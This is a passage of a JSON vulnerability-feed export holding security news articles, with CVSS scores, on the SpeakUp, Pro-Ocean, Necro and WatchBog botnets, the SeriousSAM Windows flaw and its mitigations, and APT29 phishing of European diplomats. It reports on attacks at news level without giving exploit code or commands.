2015.\n\nResearchers made the connection after discovering that Xbash hard-coded a bunch of domain names as its C2 servers \u2013 some of which were reused from previous Windows coinminers attributed to Iron cybercrime group.\n\n\u201cAfter further investigation we realized it\u2019s a combination of botnet and ransomware that developed by an active cybercrime group Iron (aka Rocke) in this year,\u201d the researchers said.\n", "cvss3": {}, "published": "2018-09-19T13:30:51", "type": "threatpost", "title": "XBash Malware Packs Double Punch: Destroys Data and Mines for Crypto Coins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2018-09-19T13:30:51", "id": "THREATPOST:A7004D2BAB0081814ED226C2F42B8A7F", "href": "https://threatpost.com/xbash-malware-packs-double-punch-destroys-data-and-mines-for-crypto-coins/137543/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-QW-VuiqP65I/YBfiIyrUF2I/AAAAAAAABpg/3YIgJQiDql0yh7jOStv7rboKaQhJ5jHPQCLcBGAsYHQ/s0/malware.jpg>)\n\nA financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. \"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.\n\nTo achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X).\n\nPro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.\n\n\"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\" Unit 42 researcher Aviv Sasson said. \"This sample has the capability to delete some cloud providers' agents and evade their detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T11:15:00", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "modified": "2021-02-01T11:15:16", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T17:01:00", "type": "thn", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "modified": "2021-06-03T17:01:42", "id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[](<https://thehackernews.com/images/-2Vh6AhRwNKs/YP6aCnEii6I/AAAAAAAABK0/Sm1Yj72UTWQ0Kh_48L0sq_91GZSVbDq8wCLcBGAsYHQ/s0/SeriousSAM-Vulnerability.jpg>)\n\nMicrosoft Windows 10 and Windows 11 users are at risk of a new unpatched vulnerability that was recently disclosed publicly.\n\nAs we reported last week, the vulnerability \u2014 [SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) \u2014 allows attackers with low-level permissions to access Windows system files to perform a Pass-the-Hash (and potentially Silver Ticket) attack. \n\nAttackers can exploit this vulnerability to obtain hashed passwords stored in the Security Account Manager (SAM) and Registry, and ultimately run arbitrary code with SYSTEM privileges.\n\nSeriousSAM vulnerability, tracked as **CVE-2021-36934**, exists in the default configuration of Windows 10 and Windows 11, specifically due to a setting that allows 'read' permissions to the built-in user's group that contains all local users.\n\nAs a result, built-in local users have access to read the SAM files and the Registry, where they can also view the hashes. Once the attacker has 'User' access, they can use a tool such as Mimikatz to gain access to the Registry or SAM, steal the hashes and convert them to passwords. Invading Domain users that way will give attackers elevated privileges on the network.\n\nBecause there is no official patch available yet from Microsoft, the best way to protect your environment from SeriousSAM vulnerability is to implement hardening measures.\n\n## Mitigating SeriousSAM\n\nAccording to Dvir Goren, CTO at CalCom, there are three optional hardening measures:\n\n 1. **Delete all users from the built-in users' group** \u2014 this is a good place to start from, but won't protect you if Administrator credentials are stolen.\n 2. **Restrict SAM files and Registry permissions** \u2014 allow access only for Administrators. This will, again, only solve part of the problem, as if an attacker steals Admin credentials, you will still be vulnerable to this vulnerability.\n 3. **Don't allow the storage of passwords and credentials for network authentication **\u2014 this rule is also recommended in the [CIS benchmarks](<https://www.calcomsoftware.com/cis-hardening-and-configuration-security-guide/>). By implementing this rule, there will be no hash stored in the SAM or registry, thereby mitigating this vulnerability completely.\n\nWhen using GPOs for implementation, make sure the following UI Path is Enabled:\n\n> Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Network access: Do not allow storage of passwords and credentials for network authentication\n\n_Despite the fact that the last recommendation offers a good solution for SeriousSAM, it may negatively impact your production if not properly tested before it is pushed. When this setting is enabled, applications that use scheduled tasks and need to store users' hashes locally will fail._\n\n## Mitigating SeriousSAM without risking causing damage to production\n\nThe following are Dvir's recommendations for mitigating without causing downtime:\n\n 1. Set up a test environment that will simulate your production environment. Simulate all possible dependencies of your network as accurately as you can.\n 2. Analyze the impact of this rule on your test environment. In this way, if you have applications that rely on hashes that are stored locally, you'll know in advance and prevent production downtime.\n 3. Push the policy where possible. Make sure new machines are also hardened and that the configuration doesn't drift over time.\n\nThese three tasks are complex and require a lot of resources and in-house expertise. Therefore, Dvir's final recommendation is to [automate the entire hardening process](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) to save the need to perform stages 1, 2 and 3. \n\nHere is what you will gain from a [Hardening Automation Tool](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>):\n\n * Automatically generate the most accurate possible impact analysis report \u2013 hardening automation tools 'learns' your production dependencies and report to you the potential impact of each policy rule. \n * Automatically enforce your policy on your entire production from a single point of control \u2013 using these tools, you won't need to do manual work, such as using GPOs. You can control and be certain all your machines are hardened.\n * Maintain your compliance posture and monitor your machines in real-time \u2013 hardening automation tools will monitor your compliance posture, alert and remediate any unauthorized changes in configurations, therefore preventing configuration drifts. \n\n[Hardening automation tools](<https://www.calcomsoftware.com?utm_source=article&utm_medium=traffic&utm_campaign=hacker+news+seriousSAM&utm_id=hacker+news+seriousSAM>) will learn the dependencies directly from your network and automatically generate an accurate impact analysis report. A hardening automation tool will also help you orchestrate the implementation and monitoring process.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T11:21:00", "type": "thn", "title": "How to Mitigate Microsoft Windows 10, 11 SeriousSAM Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T11:21:00", "id": "THN:777A53E3DACA2E9D76D60AB889CFD10F", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEg1htgV20xnZFGHy8xys5a3a8RDOEZB9kzl6RyaRUmt6zE03r6yB_FnqpjR1iu5tj48oBafZq6mQ2iT7IbFULnsgOYBOXm01lnZjwIF1anuI3nLsK7lL87KbyL1UWUYNDmzgkLRurzHi4oYNIEIxTxXzkVXRR89_meOuJ0FAHhdAvY6naUEmPbN4lFS>)\n\nThe Russia-linked threat actor known as APT29 targeted European diplomatic missions and Ministries of Foreign Affairs as part of a series of spear-phishing campaigns mounted in October and November 2021.\n\nAccording to ESET's [T3 2021 Threat Report](<https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/>) shared with The Hacker News, the intrusions paved the way for the deployment of Cobalt Strike Beacon on compromised systems, followed by leveraging the foothold to drop additional malware for gathering information about the hosts and other machines in the same network.\n\nAlso tracked under the names The Dukes, Cozy Bear, and Nobelium, the advanced persistent threat group is an infamous cyber-espionage group that has been active for more than a decade, with its attacks targeting Europe and the U.S., before it gained widespread attention for the [supply\u2010chain compromise](<https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html>) of SolarWinds, leading to further infections in several downstream entities, including U.S. government agencies in 2020.\n\nThe spear-phishing attacks commenced with a COVID-19-themed phishing email impersonating the Iranian Ministry of Foreign Affairs and containing an HTML attachment that, when opened, prompts the recipients to open or save what appears to be an ISO disk image file (\"Covid.iso\").\n\nShould the victim opt to open or download the file, \"a small piece of JavaScript decodes the ISO file, which is embedded directly in the HTML attachment.\" The disk image file, in turn, includes an HTML application that's executed using [mshta.exe](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>) to run a piece of PowerShell code that ultimately loads the Cobalt Strike Beacon onto the infected system.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEglwgfTakz5tfhTSwDOMYonZpvaHlCIHm8s2Siv7LsnSe0W0dFfpgbBClJWSt9tMLfPmBA10CeMIEH53LnLbqlrg4zv9mKFmIl7GHJ76TVTXmsXgB8kdL4wAXSnI_z-0ph0Mzn4DlYyAAJOJF4XIwYxPtw_NiqMAtsbd7VscqKWz0U20rPFTUjqwiDP>)\n\nESET also characterized APT29's reliance on HTML and ISO disk images (or VHDX files) as an evasion technique orchestrated specifically to evade Mark of the Web ([MOTW](<https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/ms537628\\(v=vs.85\\)>)) protections, a security feature introduced by Microsoft to determine the origin of a file.\n\n\"An ISO disk image doesn't propagate the so-called Mark of the Web to the files inside the disk image,\" the researchers said. \"As such, and even if the ISO were downloaded from the internet, no warning would be displayed to the victim when the HTA is opened.\"\n\nUpon successfully gaining initial access, the threat actor delivered a variety of off-the-shelf tools to query the target's Active Directory ([AdFind](<https://www.joeware.net/freetools/tools/adfind/>)), execute commands on a remote machine using SMB protocol ([Sharp-SMBExec](<https://github.com/checkymander/Sharp-SMBExec>)), carry out reconnaissance ([SharpView](<https://github.com/tevora-threat/SharpView>)), and even an exploit for a Windows privilege escalation flaw ([CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)) to carry out follow-on attacks.\n\n\"Recent months have shown that The Dukes are a serious threat to western organizations, especially in the diplomatic sector,\" the researchers noted. \"They are very persistent, have good operational security, and they know how to create convincing phishing messages.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T10:46:00", "type": "thn", "title": "Russian APT Hackers Used COVID-19 Lures to Target European Diplomats", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T03:04:57", "id": "THN:894809E1ADF0684644DCCDD97F76BC73", "href": "https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:53", "description": "[](<https://thehackernews.com/images/-EUMkX9DWZUw/XTl2aLC2WFI/AAAAAAAA0jg/7Xl_-nE_HVUt9_1bnZYbpy7o3vPWCbGHwCLcBGAs/s728-e100/linux-malware-windows-bluekeep.jpg>)\n\nCybersecurity researchers have discovered a new variant of **WatchBog**, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers vulnerable to the [Bluekeep flaw](<https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html>). \n \nBlueKeep is a highly-critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over RDP protocol. \n \nThough the [patches for the BlueKeep](<https://thehackernews.com/2019/05/microsoft-security-updates.html>) vulnerability (CVE\u20132019-0708) was already released by Microsoft in May this year, more than [800,000 Windows machines](<https://www.bitsight.com/blog/industry-response-to-bluekeep-vulnerability>) accessible over the Internet are still vulnerable to the critical flaw. \n \nFortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available till the date, potentially preventing opportunistic hackers from wreaking havoc. \n \nHowever, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit. \n\n\n \nIt appears the attackers behind WatchBog are using their botnet network to prepare \"a list of vulnerable systems to target in the future or to sell to third party vendors for profit,\" warned the researchers from [Intezer Lab](<https://www.intezer.com/blog-watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/>), who discovered the new WatchBog variant. \n \n\n\n> \"The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,\" the researchers said.\n\n \nThe BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the 